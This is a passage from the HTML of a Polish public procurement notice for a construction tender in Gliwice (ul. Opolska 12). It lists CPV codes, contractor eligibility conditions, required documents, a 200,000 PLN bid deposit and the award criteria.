sobie prawowywieszenia na terenie budowy bannera reklamującego firmę Zamawiającego. 3.22.Wykonawca zobowiązany jest do zachowania dyskrecji i tajemnicy odnośnie ewentualniepowierzonych i w toku wykonywania zamówienia pozyskanych informacji dotyczącychZarządu Budynków Miejskich I TBS Sp. z o.o. w Gliwicach. 3.23. Zamawiający niedopuszcza składania ofert wariantowych. 3.24. Zamawiający nie dopuszcza składania ofertczęściowych. 3.25. Zamawiający nie dopuszcza możliwości zawarcia umowy ramowej. 3.26.Miejsce realizacji: Gliwice, ul. Opolska 12.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">45211340-4</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45000000-7</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45300000-0</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45331100-7</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45330000-9</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45321000-3</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45310000-3</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45316100-6</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45332000-3</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45442200-9</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45231112-3</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45420000-7</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45431200-6</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45442100-8</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45450000-6</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45111200-0</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45233200-1</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45261210-9</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45262300-4</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45262410-8</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45262522-6</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45320000-6</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45410000-4</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach">20</span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia"></span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow">1.Zamówienie musi zostać zrealizowane w terminie 20 miesięcy od daty przekazania placu budowy. 2.Przekazanie placu budowy nastąpi w lipcu2019r. Nieprzyjęcie palcu przez Wykonawcę spowoduje odstąpienie od umowy przez Zamawiającego z winy Wykonawcy.</span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Zamawiający nie precyzuje w tym zakresie żadnych wymagań,których spełnienie Wykonawca jest zobowiązany wykazać w sposób szczególny.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">O udzielenie zamówienia publicznego mogą ubiegać się wykonawcy,którzy spełniają warunki, dotyczące sytuacji ekonomicznej lub finansowej. Ocena spełnianiawarunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia. W celuspełnienia warunku Wykonawca musi wykazać: a) iż posiada ubezpieczenie ododpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotemzamówienia na sumę gwarancyjną minimum 2.000.000,00zł [słownie: dwa miliony złotych00/100]. b) iż dysponuje środkami finansowymi w wysokości minimum 1.000.000,00zł[słownie: jeden milion złotych 00/100].</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">O udzielenie zamówienia publicznego mogą ubiegać się wykonawcy,którzy spełniają warunki, dotyczące zdolności technicznej lub zawodowej. Ocena spełnianiawarunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnichpięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jestkrótszy - w tym okresie, zrealizował dwa oddzielne zamówienia: Pierwsze zamówienie polegające na wybudowaniu budynku/budynków mieszkalnych, usługowych, biurowych,handlowych, użyteczności publicznej; minimum dwukondygnacyjnych o łącznej kubaturze minimum 6000 m3 w stanie minimum developerskim (całkowite wykończenie budynku z zewnątrz oraz częściowe wykończenie wewnątrz obejmujące: ściany otynkowane iprzygotowane do malowania, sufity, wylewki, okna, parapety wewnętrzne, rozprowadzeniewszystkich instalacji ale bez ich zakończenia odpowiednią armaturą). Drugie zamówienie polegające na wybudowaniu budynku/budynków mieszkalnych, usługowych, biurowych,handlowych, użyteczności publicznej; minimum dwukondygnacyjnych o łącznej kubaturze minimum 6.000 m3 w stanie minimum developerskim (całkowite wykończenie budynku z zewnątrz oraz częściowe wykończenie wewnątrz obejmujące: ściany otynkowane iprzygotowane do malowania, sufity, wylewki, okna, parapety wewnętrzne, rozprowadzeniewszystkich instalacji ale bez ich zakończenia odpowiednią armaturą). Wykonawca nie może sumować wartości kilku robót o mniejszym zakresiedla uzyskania wymaganych wartości porównywalnych. Ponadto Zamawiający uzna warunekza spełniony, jeżeli Wykonawca wykaże, że dysponuje osobami, które będą uczestniczyły wwykonywaniu zamówienia, legitymującymi się odpowiednimi kwalifikacjami zawodowymi,wykształceniem i doświadczeniem, niezbędnymi do wykonania zamówienia oraz będą posiadały stosowne uprawnienia budowlane określone przepisami Prawa Budowlanego, a ponadto są członkami właściwej izby samorządu zawodowego: a) co najmniej jedną osobą,która będzie pełnić funkcję kierownika budowy, posiadającą uprawnienia budowlane dokierowania robotami w specjalności konstrukcyjno-budowlanej bez ograniczeń, b) conajmniej jedną osobą, która będzie pełnić funkcję kierownika robót w branży konstrukcyjnobudowlanej posiadającą uprawnienia budowlane do kierowania robotami w specjalnościkonstrukcyjno-budowlanej bez ograniczeń, c) co najmniej jedną osobą, która będzie pełnić funkcję kierownika robót w branży instalacyjnej posiadającą uprawnienia budowlane dokierowania robotami w zakresie sieci, instalacji i urządzeń cieplnych, wodociągowych ikanalizacyjnych bez ograniczeń, d) co najmniej jedną osobą, która będzie pełnić funkcję kierownika robót wbranży elektrycznej, posiadającą uprawnienia budowlane do kierowania robotami w zakresiesieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń e) co najmniej jedną osobą,która będzie pełnić funkcję kierownika robót w branży drogowej bez ograniczeń. Zamawiający dopuszcza możliwość łączenia ww. funkcji przy spełnieniu wymagań dla danych funkcji. Zamawiający określając wymogi dla każdej osoby w zakresie posiadanych uprawnień budowlanychdopuszcza odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów i uprawniają do kierowania robotami będącymi przedmiotem niniejszego postępowania oraz odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej,z zastrzeżeniem art. 12a oraz innych przepisów ustawy z dnia 7 lipca 1994 r. PrawoBudowlane (tekst jedn. Dz. U. z 2016 r., poz. 290 z późn. zm.) oraz ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwachczłonkowskich Unii Europejskiej (Dz. U z 2016 r., poz. 65 z późn. zm.).</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Tak</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">1.Odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalnościgospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celupotwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy Pzp.2.Zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzającego, żewykonawca nie zalega z opłacaniem podatków, wystawionego nie wcześniej niż 3 miesiąceprzed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału wpostępowaniu, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumieniez właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymiodsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie,odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonaniadecyzji właściwego organu. 3.Zaświadczenie właściwej terenowej jednostki organizacyjnejZakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego alboinnego dokumentu potwierdzającego, że wykonawca nie zalega z opłacaniem składek naubezpieczenia społeczne lub zdrowotne, wystawionego nie wcześniej niż 3 miesiące przedupływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu,lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwymorganem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, wszczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na ratyzaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.4.Informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 13, 14i 21 ustawy Pzp wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składaniaofert albo wniosków o dopuszczenie do udziału w postępowaniu. 5.Wykonawca powołującysię przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innychpodmiotów, które będą brały udział w realizacji części zamówienia, przedkłada takżedokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy.</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">1.Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przedupływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu,a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ichrodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostaływykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonanenależycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie zprzepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o którychmowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz któregoroboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnymcharakterze wykonawca nie jest w stanie uzyskać tych dokumentów - inne dokumenty.2.Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, wszczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanierobotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych,uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówieniapublicznego, a także zakresu wykonywanych przez nie czynności oraz informacją opodstawie do dysponowania tymi osobami. 3.Potwierdzenie, że wykonawca jestubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanejz przedmiotem zamówienia na sumę gwarancyjną minimum 2.000.000,00zł. Zamawiającyakceptuje franszyzę integralną i redukcyjną nie wyższą niż 10% sumy ubezpieczenia dlakażdej szkody.4. Potwierdzenie - informacja banku lub spółdzielczej kasy oszczędnościowokredytowejpotwierdzająca wysokość posiadanych środków finansowych lub zdolnośćkredytową wykonawcy, wystawiona nie wcześniej niż 1 miesiąc przed upływem terminuskładania ofert na kwotę 1.000.000,00zł.</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci">1.Formularz oferty 2. Harmonogramem rzeczowo-finansowy (składany w trybie Art.24aaPZP) 3.Wykaz części zamówienia, której wykonanie wykonawca zamierza powierzyćpodwykonawcom 4.Zaparafowany projekt umowy. 5.Dowód wniesienia wadium. 6.Oświadczenie o braku zaległości z tytułu zobowiązań dla Miasta Gliwice. 7. Pełnomocnictwa(jeśli dotyczy).</span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Tak</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium">Zgodnie z numeracją SIWZ: 13.1. Oferta musi być zabezpieczona wadium w wysokości:200.000.00 PLN [słownie: dwieście tysięcy 00/100 PLN]. 13.2. Wadium należy wnieść wterminie do dnia 12.06.2019r. do godz. 09:00. 13.3. Wadium może być wnoszone w jednejlub kilku następujących formach: a) pieniądzu - przelewem na rachunek bankowyZamawiającego: ING Bank - oddział w Gliwicach 20 1050 1285 1000 0022 2649 4546. b)poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej ztym, że poręczenie kasy jest zawsze poręczeniem pieniężnym; c) gwarancjach bankowych; d)gwarancjach ubezpieczeniowych; e) poręczeniach udzielanych przez podmioty, o którychmowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej AgencjiRozwoju Przedsiębiorczości (t.j. Dz. U. z dnia 2007r. nr 42, poz. 275 z późn. zm.). 13.4.Wykonawca zobowiązany jest wnieść wadium na okres związania ofertą. 13.5. Za terminwniesienia wadium w pieniądzu zostanie przyjęty termin uznania rachunku Zamawiającego.13.6. Wadium wniesione w formie innej niż pieniężna musi być czynnością jednostronniezobowiązującą, mieć taką samą płynność jak wadium wniesione w pieniądzu, obejmowaćodpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę,określone w art. 46 ust. 4a i 5 ustawy PZP oraz zawierać w swojej treści nieodwołalne ibezwarunkowe zobowiązanie wystawcy dokumentu do zapłaty kwoty wadium na rzeczZamawiającego. 13.7. Zamawiający zwróci wadium na zasadach określonych w art. 46 ust.1,1a, 2 i 4 ustawy PZP. 13.8. Zamawiający żąda ponownego wniesienia wadium przezWykonawcę, któremu zwrócono wadium na podstawie art. 46 ust. 1 ustawy PZP, jeżeli wwyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza.Wykonawca wnosi wadium w terminie określonym przez Zamawiającego. 13.9. Zamawiającyzatrzyma wadium wraz z odsetkami, w przypadkach określonych w art. 46 ust. 4a i 5 ustawyPZP</span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej"></span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna"></span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>80,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Gwarancja i rękojmia na przedmiot zamówienia - dach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>8,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Gwarancja i rękojmia na przedmiot zamówienia - urządzenia</TD><TD style='border: 1px solid black;border-collapse: collapse;'>4,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Gwarancja i rękojmia na przedmiot zamówienia (z wyłączeniem pokrycia dachowego i urządzeń na które zostanie udzielona osobna gwarancja i rękojmia)</TD><TD style='border: 1px solid black;border-collapse: collapse;'>8,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span 